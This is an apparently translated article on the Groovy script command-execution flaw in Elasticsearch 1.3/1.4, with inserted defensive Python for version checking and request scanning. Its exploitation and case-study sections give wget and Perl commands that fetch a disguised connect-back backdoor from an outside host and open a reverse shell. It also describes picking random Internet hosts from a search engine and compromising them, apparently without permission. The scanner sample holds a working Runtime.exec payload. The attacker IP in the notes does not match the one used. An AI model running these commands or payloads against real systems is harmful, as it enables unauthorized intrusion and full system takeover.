ElasticSearch command execution vulnerability: reverse shell through Perl

Source: Internet
Author: User


Elasticsearch is a Lucene-based search server. It provides a distributed, multi-tenant full-text search engine behind a RESTful HTTP interface. It is written in Java and released as open source under the Apache license, and it is widely described as the second most popular enterprise search engine. Designed for cloud deployments, it offers near-real-time search and is stable, fast, and easy to install and use. Tens of thousands of Elasticsearch instances are reachable on the public Internet, and internal deployments are countless.

Elasticsearch has shipped with two scripting engines that turned out to be dangerous: MVEL and Groovy. In May 2014 a command execution vulnerability in MVEL scripting was disclosed; this time it is Groovy's turn. Elasticsearch 1.3.0 through 1.3.7 and 1.4.0 through 1.4.2 carry a Groovy script engine vulnerability (tracked as CVE-2015-1427) that lets an attacker submit a crafted Groovy script which escapes the sandbox and executes shell commands. The fixed releases are 1.3.8 and 1.4.3. This bug is no less serious than the Struts command execution vulnerabilities: it works on both Linux and Windows, and in practice the Elasticsearch process is often run as root or SYSTEM, so a successful attacker gets a webshell with full system privileges.

Affected versions:

cpe:/a:elasticsearch:1.4.2

cpe:/a:elasticsearch:1.4.0

cpe:/a:elasticsearch:1.3.7

cpe:/a:elasticsearch:1.4.0:beta1

cpe:/a:elasticsearch:1.4.1
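The following Python check is an added example; it is not part of the original article and not Elasticsearch's own code. It parses the version.number field of the JSON that GET / returns on port 9200 and reports whether the node falls inside the ranges the article lists as vulnerable (1.3.0 to 1.3.7 and 1.4.0 to 1.4.2, the 1.4.0 betas included). The two sample banners are constructed for the example, not captured from real hosts.

```python
"""Added example: classify an Elasticsearch node as inside or outside the
version ranges affected by the Groovy sandbox bypass, using the JSON
banner that GET http://host:9200/ returns."""
import json
import re

# Inclusive affected ranges as stated in the article; 1.3.8 and 1.4.3 fixed it.
AFFECTED_RANGES = [((1, 3, 0), (1, 3, 7)), ((1, 4, 0), (1, 4, 2))]

# Matches "1.4.2" as well as pre-release forms such as "1.4.0.Beta1".
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:[.\-]([A-Za-z0-9]+))?$")


def parse_version(text):
    """Return ((major, minor, patch), prerelease_tag_or_None).

    Raises ValueError for strings that do not look like a release number."""
    match = _VERSION_RE.match(text.strip())
    if not match:
        raise ValueError("unrecognised version string: %r" % text)
    core = tuple(int(part) for part in match.group(1, 2, 3))
    return core, match.group(4)


def is_affected(version_text):
    """True when the version lies inside an affected range.

    A pre-release tag does not move a version out of a range: 1.4.0.Beta1
    is listed as affected, so it is compared as 1.4.0."""
    core, _tag = parse_version(version_text)
    return any(low <= core <= high for low, high in AFFECTED_RANGES)


def assess_banner(banner_json):
    """Classify the body returned by GET / and echo the reported version."""
    info = json.loads(banner_json)
    number = info["version"]["number"]
    if is_affected(number):
        return "affected", number
    return "not in affected range", number


# Constructed sample banners (not captured from any real host).
SAMPLE_VULNERABLE = json.dumps({
    "status": 200, "name": "node-1",
    "version": {"number": "1.4.2", "build_snapshot": False},
    "tagline": "You Know, for Search",
})
SAMPLE_FIXED = json.dumps({
    "status": 200, "name": "node-2",
    "version": {"number": "1.4.3", "build_snapshot": False},
    "tagline": "You Know, for Search",
})

if __name__ == "__main__":
    for banner in (SAMPLE_VULNERABLE, SAMPLE_FIXED):
        print("%s -> %s" % assess_banner(banner)[::-1])
```

To use it against a live node, fetch http://host:9200/ and hand the body to assess_banner(). A node reporting 1.3.8, 1.4.3 or later is outside the affected range, but any node answering unauthenticated on 9200 from the Internet still deserves attention regardless of its version.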

(1) POC

Target URL: http://www.antian365.com:9200/_search?pretty

Submit the following data by POST:

(2) Python POC script

Save the following code as ElasticSearch.py and run python ElasticSearch.py http://www.antian365.com:9200/ "cat /etc/issue". Replace "cat /etc/issue" with whatever command you want executed on the target.

(3) Obtaining a shell with a Perl connect-back script

Prepare a Perl connect-back script, such as back.pl, on a host with a public IP address. You can upload the script to a web site renamed as a .jpg or .txt file so that the target can download it, for example www.antian365.com/lab/linux0day/back.pl.txt. Then run the following commands in order.

Notes:

(1) www.antian365.com stands for the IP address or domain name of the target. 123.123.123.123 is a separate public IP address controlled by the attacker; the listener binds to port 80 there, so nothing else on that host may be serving on port 80.

(2) On some servers the command fails because Perl is not installed.

(4) Case study

(1) Find a target

Query a host search engine with q=ElasticSearch&t=host. The results show the distribution of the software by country. Pick an IP address at random; in this example the first one, http://192.241.225.207/, is chosen. Click the link in the upper-right corner of the entry, which opens http://192.241.225.207:9200.

Figure 1 Searching for targets

(2) Execute commands

Running python ElasticSearch.py http://192.241.225.207/ "/usr/bin/wget www.antian365.com/lab/linux0day/back.pl.txt -O /tmp/back.pl" directly returns "HTTP Error 500: Internal Server Error", as shown in Figure 2.

Test again with the portable version of Firefox: open the target address http://192.241.225.207:9200/_search?pretty and enter the POC in the POST data field.

The result, shown in Figure 3, indicates that the vulnerability has been fixed on this host or cannot be exploited there.

Figure 2 Running the command

Figure 3 Re-testing whether the vulnerability can be exploited

After testing several search results, an IP address that is still vulnerable turns up. Run the following command first; it prints nothing, which means the file has been downloaded to the target:

python ElasticSearch.py http://192.241.222.40:9200/ "/usr/bin/wget www.antian365.com/lab/linux0day/back.pl.txt -O /tmp/back.pl"

Then run the next command. The output "Perl Connect-back Backdoor, Auther: Maple-x" shows that the script ran, as in Figure 4:

python ElasticSearch.py http://192.241.222.40:9200/ "/usr/bin/perl /tmp/back.pl 124.123.122.11 80"

Within a few seconds the shell connects back to the local listening port. Running ifconfig there, as in Figure 5, confirms that the reverse shell works; an intruder would continue with post-exploitation from here.

Figure 4 Reverse shell command succeeded

Figure 5 Shell received

(5) Solution

Upgrade to the latest version. If you cannot upgrade, set script.groovy.sandbox.enabled: false in elasticsearch.yml; note that this turns off dynamic Groovy scripting altogether, so any feature that relies on dynamic scripts stops working. Independently of the fix, do not expose port 9200 to the Internet: the REST API in these releases has no authentication of its own, and the targets in this article were found simply by searching for hosts with the port open.
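As an added example (not from the original article, and not Elasticsearch's own code), the detector below scans captured _search request bodies, such as those a reverse proxy in front of port 9200 can log, for dynamic Groovy scripts that reference JVM process or reflection APIs. The public exploits for this bug place such a script in script_fields, which is the request the article's POC sends. The sample requests are constructed for the example; the client addresses and the field name myfield are assumptions. Because Groovy strings can be assembled at runtime, a pattern match like this is a signal, not a control; the fix remains the upgrade.

```python
"""Added example: screen captured _search request bodies for dynamic Groovy
scripts that reach into the JVM runtime. Sample requests are constructed
for this example, not captured from any real host."""
import json
import re

# API names a field, score or filter script never needs. The public exploits
# reach java.lang.Runtime through reflection (Class.forName / getRuntime),
# so those names sit alongside direct process-spawning calls.
DANGEROUS = re.compile(
    r"Runtime|ProcessBuilder|forName\s*\(|\.exec\s*\(|java\.io\.File|System\.getenv"
)


def find_scripts(node, path="$"):
    """Yield (json_path, lang, script_text) for every string-valued "script"
    in a request body. In Elasticsearch 1.3/1.4 the default script language
    is groovy, so a missing "lang" is treated as groovy."""
    if isinstance(node, dict):
        if isinstance(node.get("script"), str):
            yield path + ".script", node.get("lang", "groovy"), node["script"]
        for key, value in node.items():
            yield from find_scripts(value, "%s.%s" % (path, key))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from find_scripts(value, "%s[%d]" % (path, index))


def suspicious_scripts(body_json):
    """Return the scripts in a JSON body that match DANGEROUS. A body that is
    not valid JSON yields no findings (Elasticsearch rejects it anyway)."""
    try:
        body = json.loads(body_json)
    except ValueError:
        return []
    return [(p, lang, s) for p, lang, s in find_scripts(body) if DANGEROUS.search(s)]


def scan_requests(requests):
    """Run suspicious_scripts over (client, method, path, body) tuples for
    POSTs to /_search and return one (client, json_path, lang) per finding."""
    alerts = []
    for client, method, path, body in requests:
        if method != "POST" or not path.startswith("/_search"):
            continue
        for json_path, lang, _script in suspicious_scripts(body):
            alerts.append((client, json_path, lang))
    return alerts


# Constructed sample bodies. The first is an ordinary computed field; the
# second obtains a Runtime through reflection, the pattern the exploits use.
BENIGN = json.dumps({
    "query": {"match_all": {}},
    "script_fields": {"price_with_tax": {"script": "doc['price'].value * 1.2"}},
})
MALICIOUS = json.dumps({
    "size": 1,
    "query": {"filtered": {"query": {"match_all": {}}}},
    "script_fields": {"myfield": {
        "lang": "groovy",
        "script": 'java.lang.Math.class.forName("java.lang.Runtime")'
                  '.getRuntime().exec("cat /etc/issue").text',
    }},
})

# Constructed proxy log: (client address, method, path, request body).
SAMPLE_REQUESTS = [
    ("10.0.0.5", "POST", "/_search?pretty", BENIGN),
    ("203.0.113.7", "POST", "/_search?pretty", MALICIOUS),
    ("203.0.113.7", "GET", "/", "{}"),
]

if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_REQUESTS):
        print("ALERT client=%s script at %s (lang=%s)" % alert)
```

The scanner only looks at POSTs to /_search because that is the endpoint this article exercises; the same script-walking logic applies unchanged to any other body-carrying API that accepts scripts, and on a 1.3/1.4 node every dynamic script arriving from an untrusted network deserves scrutiny, whatever it contains.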
